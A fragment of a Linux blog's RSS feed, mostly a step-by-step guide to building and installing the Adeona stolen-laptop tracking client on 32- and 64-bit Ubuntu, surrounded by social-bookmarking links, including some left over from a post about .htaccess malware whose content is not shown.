			<a href="http://www.blogospherenews.com/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Blogosphere News">Share this on Blogosphere News</a>
		</li>
		<li class="sexy-webblend">
			<a href="http://thewebblend.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;body=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Blend this!">Blend this!</a>
		</li>
		<li class="sexy-wykop">
			<a href="http://www.wykop.pl/dodaj?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Add this to Wykop!">Add this to Wykop!</a>
		</li>
		<li class="sexy-blogengage">
			<a href="http://www.blogengage.com/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
		<li class="sexy-hyves">
			<a href="http://www.hyves.nl/profilemanage/add/tips/?name=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;text=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos+-+http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;rating=5" rel="nofollow" class="external" title="Share this on Hyves">Share this on Hyves</a>
		</li>
		<li class="sexy-pusha">
			<a href="http://www.pusha.se/posta?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Push this on Pusha">Push this on Pusha</a>
		</li>
		<li class="sexy-hatena">
			<a href="http://b.hatena.ne.jp/add?mode=confirm&amp;url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Bookmarks this on Hatena Bookmarks">Bookmarks this on Hatena Bookmarks</a>
		</li>
		<li class="sexy-mylinkvault">
			<a href="http://www.mylinkvault.com/link-page.php?u=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;n=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Store this link on MyLinkVault">Store this link on MyLinkVault</a>
		</li>
		<li class="sexy-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="sexy-squidoo">
			<a href="http://www.squidoo.com/lensmaster/bookmark?http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Add to a lense on Squidoo">Add to a lense on Squidoo</a>
		</li>
		<li class="sexy-propeller">
			<a href="http://www.propeller.com/submit/?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Submit this story to Propeller">Submit this story to Propeller</a>
		</li>
		<li class="sexy-faqpal">
			<a href="http://www.faqpal.com/submit?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Submit this to FAQpal">Submit this to FAQpal</a>
		</li>
		<li class="sexy-evernote">
			<a href="http://www.evernote.com/clip.action?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Clip this to Evernote">Clip this to Evernote</a>
		</li>
		<li class="sexy-meneame">
			<a href="http://meneame.net/submit.php?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Submit this to Meneame">Submit this to Meneame</a>
		</li>
		<li class="sexy-bitacoras">
			<a href="http://bitacoras.com/anotaciones/http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/" rel="nofollow" class="external" title="Submit this to Bitacoras">Submit this to Bitacoras</a>
		</li>
		<li class="sexy-jumptags">
			<a href="http://www.jumptags.com/add/?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit this link to JumpTags">Submit this link to JumpTags</a>
		</li>
		<li class="sexy-bebo">
			<a href="http://www.bebo.com/c/share?Url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;Title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Share this on Bebo">Share this on Bebo</a>
		</li>
		<li class="sexy-n4g">
			<a href="http://www.n4g.com/tips.aspx?url=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;title=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic" rel="nofollow" class="external" title="Submit tip to N4G">Submit tip to N4G</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Gnarly+Malware+-+Hijacks+Website+.htaccess+and+Steals+Search+Engine+Traffic&amp;du=http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/&amp;cn=A%20friend%20in%20the%20US%20called%20me%20a%20few%20days%20ago%2C%20asking%20me%20to%20take%20a%20look%20at%20his%20website%2C%20calypsoislandtours.com%2C%20since%20his%20site%20traffic%20had%20dropped%20dramatically%2C%20for%20no%20obvious%20reason.%20Upon%20further%20investigation%2C%20he%20discovered%20that%20only%20search%20engine%20traffic%20was%20affected%2C%20which%2C%20as%20with%20many%20if%20not%20mos" rel="nofollow" class="external" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->



<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search-engine-traffic/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Track and Trace your stolen or missing Laptop with Adeona, on 32 and 64 Bit Ubuntu</title>
		<link>http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/</link>
		<comments>http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/#comments</comments>
		<pubDate>Sat, 15 Nov 2008 08:35:24 +0000</pubDate>
		<dc:creator>Hodge</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[adeona]]></category>
		<category><![CDATA[HowTo]]></category>

		<guid isPermaLink="false">http://www.64bitjungle.com/?p=193</guid>
		<description><![CDATA[
Adeona is an Open Source system for tracking stolen and lost laptops/notebooks, developed by the University of Washington Computer Science and Engineering department. It&#8217;s also one of the few systems which doesn&#8217;t require a silly BIOS hack, or access to proprietary services, and is available for Linux, Windozzze and Mac OSX. Since 64bitjungle is a [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://adeona.cs.washington.edu" target="_blank"><img class="size-full wp-image-194 aligncenter" title="Adeona logo - Track a stolen laptop" src="http://www.64bitjungle.com/wp-content/uploads/2008/11/adeonalogo.jpg" alt="Adeona logo - Track a stolen laptop" width="352" height="151" /></a></p>
<p style="text-align: left;"><a href="http://adeona.cs.washington.edu" target="_blank">Adeona</a> is an Open Source system for tracking stolen and lost laptops/notebooks, developed by the <a href="http://www.cs.washington.edu/" target="_blank">University of Washington Computer Science and Engineering department</a>. It&#8217;s also one of the few systems which doesn&#8217;t require a silly BIOS hack, or access to proprietary services, and is available for Linux, Windozzze and Mac OSX. Since 64bitjungle is a site dealing with Linux, I&#8217;ll obviously focus on the Linux version &#8211; although, the Windozzze and Mac versions are available as binary installers, so should be pretty easy to set up.</p>
<p style="text-align: left;">The only prerequisites for Adeona are OpenSSL, traceroute, libssl-dev, and cron which, with the exception of traceroute and libssl-dev, are installed by default on most Linus distributions. To install traceroute on Ubuntu, simly open a terminal (Applications -&gt; Accessories -&gt; Terminal) and run:</p>
<p style="text-align: left;"><code>sudo apt-get install traceroute libssl-dev</code></p>
<p style="text-align: left;">Setting up Adeona itself involves downloading, compiling and installing a small client application. The current version, 0.2.1a, can be downloaded from the <a href="http://adeona.cs.washington.edu/sourcedownload.html" target="_blank">Adeona download page</a> as a 3.5 Mb tarball. extract the tarball:</p>
<p style="text-align: left;"><code>cd ~/Desktop<br />
tar -zxvf adeona-0.2.1.tar.gz<br />
cd adeona</code></p>
<p style="text-align: left;"><strong>32 Bit Installation</strong></p>
<p style="text-align: left;">Installing on a 32 bit system is <span style="text-decoration: line-through;">a snap</span> not <em>quite</em> as easy as installing from a .deb, and involves compiling and configuring the source code:</p>
<p style="text-align: left;"><code>./configure<br />
sudo make install</code></p>
<p style="text-align: left;"><strong>64 Bit Installation</strong></p>
<p style="text-align: left;">64 Bit systems entail much more work. Download and install the getlibs package:</p>
<p style="text-align: left;"><code>wget http://www.boundlesssupremacy.com/Cappy/getlibs/getlibs-all.deb<br />
sudo dpkg -i getlibs-all.deb</code></p>
<p style="text-align: left;">Then, from the adeoma directory, run:</p>
<p style="text-align: left;"><code>getlibs -l libcrypto.a</code></p>
<p style="text-align: left;">This will detect, download and install any 32 bit libraries required to build Adeona. In many cases, this will be libssl-dev. If you don&#8217;t have them already, the ia32-libs package also needs installing:</p>
<p style="text-align: left;"><code>sudo apt-get install ia32-libs</code></p>
<p style="text-align: left;">The Makefile may also requires a small change, so first make a backup, then open it up in a text editor:</p>
<p style="text-align: left;"><code>cp Makefile Makefile.bak<br />
gksu gedit Makefile</code></p>
<p style="text-align: left;">Find the CFLAGS variable (the line &#8220;CFLAGS := -Wall&#8221; &#8211; line 46 in the current release) and add a new line after it, with &#8220;CFLAGS += -m32&#8243;, so that the lines are now:</p>
<p style="text-align: left;"><code>CFLAGS := -Wall<br />
CFLAGS += -m32</code></p>
<p style="text-align: left;">Save the file, and close the text editor. Now, configure, and install:</p>
<p style="text-align: left;"><code>./configure<br />
sudo make install</code></p>
<p style="text-align: left;">This should hopefully work for most users. However, I was receiving the following error when compiling:</p>
<p style="text-align: left;"><code>/usr/include/gnu/stubs.h:7:27: error: gnu/stubs-32.h: No such file or directory</code></p>
<p style="text-align: left;">Installing libc6-dev-i386 solved the problem:</p>
<p style="text-align: left;"><code>sudo apt-get install libc6-dev-i386</code></p>
<p style="text-align: left;">If you had to install libc6-dev-i386 following the above error, remember to run:</p>
<p style="text-align: left;"><code>make clean</code></p>
<p style="text-align: left;">before running</p>
<p style="text-align: left;"><code>sudo make install</code></p>
<p style="text-align: left;"><strong>Post Installation Steps (32 and 64 Bit)</strong></p>
<p style="text-align: left;">Adeona initialises immediately after the code has compiled and installed, and requires a little configuration. First, it asks for a password, and to verify the password. Finally, a line needs to be added to crontab &#8211; this line is output once the installation and initialisation is complete. It&#8217;s dependent on where you installed Adeona, but the default is:</p>
<p style="text-align: left;"><code>@reboot /usr/local/adeona/adeona-client.exe -s /usr/local/adeona/adeona-clientstate.cst -r /usr/local/adeona/resources/ -l /usr/local/adeona/logs/ &amp;</code></p>
<p style="text-align: left;">So, highlight the line output by Adeona, right click and &#8220;Copy&#8221; , then open up crontab for editing:</p>
<p style="text-align: left;"><code>sudo crontab -e</code></p>
<p style="text-align: left;">and choose &#8220;nano&#8221; (it&#8217;s much easier than vi(m) if you&#8217;ve never used a text editor from the terminal before). Move the cursor to the end of the last line, and hit return to add a new line, then right click and &#8220;Paste&#8221; the line output from Adeona. Push Ctrl+X to exit, and choose &#8220;Y&#8221; to save the changes. If you&#8217;re using vi, then you know what to do&#8230; That&#8217;s it.</p>
<p style="text-align: left;">During the installation process, a file called &#8220;adeona-retrievecredentials.ost&#8221; was created &#8211; move it to a better location, and/or make a note/remember that location.</p>
<p style="text-align: left;">Reboot.</p>
<p style="text-align: left;"><strong>Data Retrieval</strong></p>
<p style="text-align: left;">Simple data retrieval can be executed by the following, in a Terminal:</p>
<p style="text-align: left;"><code>/usr/local/adeona</code><code>/adeona-retrieve.exe -r </code><code>/usr/local/adeona</code><code>/resources/ -l /path/to/results -s /path/to/your/adeona-retrievecredentials.ost -n 1</code></p>
<p style="text-align: left;">Change /path/to/results to some thing such as /home/&lt;username&gt;/adeona-results.txt (where &lt;username&gt;  is your username), and /path/to/your/adeona-retrievecredentials.ost to the location the file adeona-retrievecredentials.ost was saved (told you to remember it!).</p>
<p style="text-align: left;">This is fine for testing, but since you&#8217;re using the machine that Adeona is installed on, and thus the one you want to track, to locate it&#8230; Not very useful if it gets stolen. Simply copy the adeona-retrievecredentials.ost file to a USB drive, Memory stick, or whatever &#8211; this file can then be used from any computer with the Adeona Retrieval Tools installed (also easy to install) to retrieve it&#8217;s last known location.</p>
<p style="text-align: left;">More information can be found at <a href="http://adeona.cs.washington.edu/documents.html" target="_blank">http://adeona.cs.washington.edu/documents.html</a></p>
<p style="text-align: left;"><strong>Uninstalling Aedona</strong></p>
<p style="text-align: left;">If you need to uninstall Aedona, simply run the following form a Terminal:</p>
<p style="text-align: left;"><code>sudo pkill adeona-client.exe<br />
sudo rm -rf /usr/local/adeona</code></p>
<p style="text-align: left;">Then run:</p>
<p style="text-align: left;"><code>sudo crontab -e</code></p>
<p style="text-align: left;">and delete the line previously added to crontab.</p>
<p style="text-align: left;"><strong>References</strong></p>
<ol style="text-align: left;">
<li><a href="http://adeona.cs.washington.edu/linuxinstallguide.html" target="_blank">Adeona Linux Installation Notes</a></li>
<li><a href="http://ubuntuforums.org/showthread.php?t=924863" target="_blank">Solving 64 Bit Dependency Issues</a></li>
<li><a href="http://groups.google.com/group/adeona-users" target="_blank">Adeona Google User Group</a></li>
<li><span><a href="http://adeona.cs.washington.edu/papers/adeona-usenixsecurity08.pdf" target="_blank">Privacy-Preserving Location Tracking of Lost or Stolen Devices: Cryptographic Techniques and Replacing Trusted Third Parties with DHTs</a> (PDF)<br />
</span></li>
</ol>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/button" title="Track and Trace your stolen or missing Laptop with Adeona, on 32 and 64 Bit Ubuntu" url="http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/"></script>

<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="sexy-scriptstyle">
			<a href="http://scriptandstyle.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit this to Script &amp; Style">Submit this to Script &amp; Style</a>
		</li>
		<li class="sexy-blinklist">
			<a href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;Title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Blinklist">Share this on Blinklist</a>
		</li>
		<li class="sexy-delicious">
			<a href="http://del.icio.us/post?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="sexy-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="sexy-diigo">
			<a href="http://www.diigo.com/post?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;desc=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="sexy-reddit">
			<a href="http://reddit.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="sexy-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;submitHeadline=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;submitSummary=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="sexy-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;t=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="sexy-designfloat">
			<a href="http://www.designfloat.com/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit this to DesignFloat">Submit this to DesignFloat</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;t=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubun%5B..%5D+-+http://tinyurl.com/6hfld3+(via+@64bitjungle)" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-mail">
			<a href="mailto:?subject=%22Track%20and%20Trace%20your%20stolen%20or%20missing%20Laptop%20with%20Adeona%2C%20on%2032%20and%2064%20Bit%20Ubuntu%22&amp;body=I%20thought%20this%20article%20might%20interest%20you.%0A%0A%22%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L%22%0A%0AYou%20can%20read%20the%20full%20article%20here%3A%20http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="sexy-tomuse">
			<a href="mailto:tips@tomuse.com?subject=New%20tip%20submitted%20via%20the%20SexyBookmarks%20Plugin!&amp;body=I%20would%20like%20to%20submit%20this%20article%3A%20%22Track%20and%20Trace%20your%20stolen%20or%20missing%20Laptop%20with%20Adeona%2C%20on%2032%20and%2064%20Bit%20Ubuntu%22%20for%20possible%20inclusion%20on%20ToMuse.%0A%0A%22%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L%22%0A%0AYou%20can%20read%20the%20full%20article%20here%3A%20http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Suggest this article to ToMuse">Suggest this article to ToMuse</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;summary=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L&amp;source=64 Bit Jungle" rel="nofollow" class="external" title="Share this on Linkedin">Share this on Linkedin</a>
		</li>
		<li class="sexy-newsvine">
			<a href="http://www.newsvine.com/_tools/seed&amp;save?u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;h=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Seed this on Newsvine">Seed this on Newsvine</a>
		</li>
		<li class="sexy-devmarks">
			<a href="http://devmarks.com/index.php?posttext=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L&amp;posturl=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;posttitle=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Devmarks">Share this on Devmarks</a>
		</li>
		<li class="sexy-google">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="sexy-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;bm_description=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="sexy-izeby">
			<a href="http://izeby.com/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Add this to Izeby">Add this to Izeby</a>
		</li>
		<li class="sexy-tipd">
			<a href="http://tipd.com/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Share this on Tipd">Share this on Tipd</a>
		</li>
		<li class="sexy-pfbuzz">
			<a href="http://pfbuzz.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on PFBuzz">Share this on PFBuzz</a>
		</li>
		<li class="sexy-friendfeed">
			<a href="http://www.friendfeed.com/share?title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;link=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Share this on FriendFeed">Share this on FriendFeed</a>
		</li>
